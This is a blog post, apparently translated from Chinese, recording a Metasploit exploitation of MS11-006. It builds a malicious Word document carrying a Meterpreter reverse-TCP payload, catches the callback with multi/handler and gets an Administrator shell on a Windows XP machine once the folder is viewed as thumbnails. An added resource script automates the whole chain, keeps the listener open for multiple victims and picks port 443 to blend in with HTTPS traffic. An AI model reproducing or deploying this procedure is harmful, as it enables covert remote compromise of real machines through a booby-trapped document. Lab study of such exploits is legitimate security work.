Metasploit file-format vulnerability exploitation (shell obtained)
Source: Internet   Editor: 程序博客网   Time: 2024/04/29 22:51
Environment: BT5 R1
msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf exploit(ms11_006_createsizeddibsection) > show options

Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):

   Name        Current Setting                     Required  Description
   ----        ---------------                     --------  -----------
   FILENAME    msf.doc                             yes       The file name.
   OUTPUTPATH  /opt/framework/msf3/data/exploits/  yes       The output path to use.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.11     yes       The listen address
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.11:443
[*] Starting the payload handler...
msf exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

msf exploit(handler) >
I copied msf.doc onto the XP machine. At first I double-clicked it, and nothing happened on the BT5 side.
Later I switched the folder to thumbnail view; without double-clicking msf.doc at all, BT5 got the callback (the book says the document has to be opened, which I suspect is a mistake).
msf exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.143
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.143:1099) at 2013-05-14 19:32:47 -0400

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  ROOT-4556186478\Administrator @ ROOT-4556186478  192.168.1.11:443 -> 192.168.1.143:1099

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:44 -0400  .
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:43 -0400  ..
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:13 -0400  Application Data
40777/rwxrwxrwx   0       dir   2013-05-14 10:14:40 -0400  Cookies
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Desktop
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:21 -0400  Favorites
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:22 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2013-05-14 11:30:17 -0400  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  NetHood
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2013-05-14 11:30:35 -0400  Recent
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:02 -0400  SendTo
40555/r-xr-xr-x   0       dir   2013-05-14 17:51:30 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2013-05-14 10:10:10 -0400  Templates
100666/rw-rw-rw-  1024    fil   2013-05-14 11:32:49 -0400  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2013-05-14 10:23:33 -0400  ntuser.ini

meterpreter > sysinfo
Computer        : ROOT-4556186478
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 1888 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>
If you switch to a Simplified Chinese edition of XP, viewing the folder in thumbnail view fails and no shell is obtained.
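The procedure above is typed interactively and split across two modules: the fileformat module only writes msf.doc, and the callback is caught by a separately configured multi/handler. The msfconsole resource script below, an added example rather than anything from the original post, does both steps in one go (run it with `msfconsole -r ms11_006.rc`) and keeps the handler alive for more than one victim with ExitOnSession. The module path and OUTPUTPATH are taken from the transcript; the LHOST/LPORT values are the same lab addresses and are an assumption for your own network. MS11-006 is a stack overflow in the Windows Shell graphics processor's thumbnail rendering (the CreateSizedDIBSECTION routine), which is why Explorer's thumbnail view triggers it without the document being opened; the handler therefore has to be listening before the folder is ever browsed.

```msfconsole
# ms11_006.rc -- added example, not from the original post.
# Step 1: generate the malicious document (this module writes a file, it never listens).
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set FILENAME msf.doc
set OUTPUTPATH /opt/framework/msf3/data/exploits/
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.11        # assumption: attacker (BT5) address from the lab transcript
set LPORT 443                 # assumption: 443 blends in with HTTPS egress
exploit

# Step 2: start the listener that matches the payload baked into msf.doc.
# LHOST/LPORT/PAYLOAD must be identical to step 1 or the stage is never delivered.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.11
set LPORT 443
set ExitOnSession false       # keep listening after the first session (several thumbnails, several victims)
exploit -j -z                 # background job, do not auto-interact with the first session

# Step 3: sanity check; expect "No active sessions." until the victim browses the folder.
sessions -l
```

Once a session arrives, `sessions -i 1` drops into it exactly as in the transcript above. If you regenerate msf.doc with different LHOST/LPORT values, restart the handler with the same values; a document built for one listener cannot call back to another.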